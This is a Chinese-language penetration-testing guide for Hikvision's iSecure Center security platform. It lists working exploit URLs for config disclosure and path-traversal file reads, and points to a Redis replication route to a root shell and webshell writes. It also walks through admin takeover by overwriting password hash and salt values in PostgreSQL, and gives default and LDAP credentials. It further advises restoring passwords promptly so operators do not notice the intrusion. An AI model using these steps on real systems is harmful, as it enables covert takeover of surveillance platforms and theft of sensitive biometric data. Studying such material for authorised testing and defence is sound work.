Hikvision综合安防管理平台渗透测试深度利用指南
一、前言
本文档详细记录了Hikvision综合安防管理平台(iSecure Center)的渗透测试过程,重点针对敏感信息泄露和文件读取漏洞的深度利用。测试环境为内部授权测试,所有敏感信息已脱敏处理。
二、工具准备
- 指纹识别工具: observer_ward
- Hikvision专项扫描工具: Hikvision-
- Redis客户端连接工具: redis-cli
- 密码解密工具: DecryptTools
- LDAP连接工具: LdapAdminTool
三、漏洞入口点
1. 敏感信息泄露漏洞
https://xxx/portal/conf/config.propertieshttps://xxx/artemis-portal/artemis/env
2. 文件读取漏洞
https://xxx/center/api/task/..;/orgManage/v1/orgs/download?fileName=etc/passwdhttps://xxx/lm/api/files;.css?link=/etc/passwd
四、敏感信息泄露利用
1. 配置文件解析
访问/portal/conf/config.properties获取关键信息:
- 8001端口:运行管理中心后台
- 7002端口:activeMQ消息交互端口
- 7019端口:Redis数据库
- 7092端口:核心PostgreSQL数据库
2. Redis利用
- 使用redis-cli连接7019端口Redis服务
- 可尝试主从复制获取root shell(推荐工具:redis-rogue-getshell)
- 注意:未做站库分离时可尝试写入webshell
五、前台登录突破
1. 关键文件路径
- Windows:
D:/hikvision/web/components/postgresql96win64.1/conf/config.properties - Linux:
/opt/hikvision/web/components/postgresql11linux64.1/conf/config.properties
2. 数据库信息
- 数据库名:irds_irdsdb
- 用户表:tb_user
- 前台地址:
https://xx:443
3. 密码重置方法
- 利用文件读取漏洞获取配置文件:
https://ip/lm/api/files;.css?link=/opt/hikvision/web/opsMgrCenter/conf/config.properties - 获取PostgreSQL密码(7092端口)
- 连接数据库修改tb_user表中的user_pwd和salt字段:
user_pwd: 1909408d3304f41421caae1fd5df984f21d70b516a315d375f94f87861eedc92 Salt: 938f7ad2436f3084a19dee5dc2e7a513892b696a8069a2f886ada7562226b1cc - 使用新密码(hik123456)登录后可立即修改回原值
六、后台登录突破
1. 关键文件路径
- Windows:
D:/hikvision/web/opsMgrCenter/conf/config.properties - Linux:
/opt/hikvision/web/opsMgrCenter/conf/config.properties
2. 数据库信息
- 数据库名:opsmgr_db
- 用户表:center_user
- 后台地址:
http://ip:8001
3. 密码重置方法
- 修改center_user表中的c_password和c_salt字段:
c_password: 1909408d3304f41421caae1fd5df984f21d70b516a315d375f94f87861eedc92 c_salt: 938f7ad2436f3084a19dee5dc2e7a513892b696a8069a2f886ada7562226b1cc - 使用用户名
sysadmin和新密码(hik123456)登录
七、其他关键配置文件
-
NTP服务:
/opt/hikvision/web/components/ntp.1/conf/config.properties -
ActiveMQ:
/opt/hikvision/web/components/activemq514linux64.1/conf/config.properties- Web界面:
http://ip:8028 - 默认凭证: admin/pass
- Web界面:
-
集群配置:
/opt/hikvision/web/components/cluster.1/conf/config.properties -
许可证管理:
/opt/hikvision/web/components/lm.1/conf/config.properties -
日志服务:
/opt/hikvision/web/components/ls.1/conf/config.properties -
许可证服务器管理:
/opt/hikvision/web/components/lsm.1/conf/config.properties -
媒体处理服务:
/opt/hikvision/web/components/mps.1/conf/config.properties- Web界面:
http://ip:8030 - 默认凭证: admin/pass
- Web界面:
-
Node.js配置:
/opt/hikvision/web/components/nodejslinux64.1/conf/config.properties -
OpenJDK配置:
/opt/hikvision/web/components/openjdk11linux64.1/conf/config.properties -
PostgreSQL配置:
/opt/hikvision/web/components/postgresql11linux64.1/conf/config.properties -
Redis配置:
/opt/hikvision/web/components/redislinux64.1/conf/config.properties -
报表服务:
/opt/hikvision/web/components/reportservice.1/conf/config.properties -
服务虚拟机:
/opt/hikvision/web/components/svm.1/conf/config.properties -
Tomcat配置:
/opt/hikvision/web/components/tomcat85linux64.1/conf/config.properties
八、LDAP服务利用
在/opt/hikvision/web/opsMgrCenter/conf/config.properties底部可找到LDAP凭证:
- BaseDN:
dc=platform,dc=hikvision,dc=com(可不填) - UserDN:
cn=Manager,dc=hikvision,dc=com - Password:
pass
九、注意事项
- 提权风险:Redis已可获取服务器root权限,不建议再进行PostgreSQL提权尝试
- 隐蔽操作:修改密码后应立即恢复原值,避免被运维发现
- 数据敏感性:该平台通常包含大量人脸库等敏感数据,获取后HVV数据分较高
- 环境差异:不同版本配置路径可能略有不同,需灵活调整
十、总结
通过本指南,渗透测试人员可以:
- 利用信息泄露漏洞获取关键配置
- 通过文件读取漏洞获取数据库凭证
- 重置前后台管理员密码获取系统控制权
- 访问多个内部服务获取更多敏感信息
- 最终实现对整个安防平台的全面控制
请确保所有测试均在合法授权范围内进行,避免对生产环境造成不必要的影响。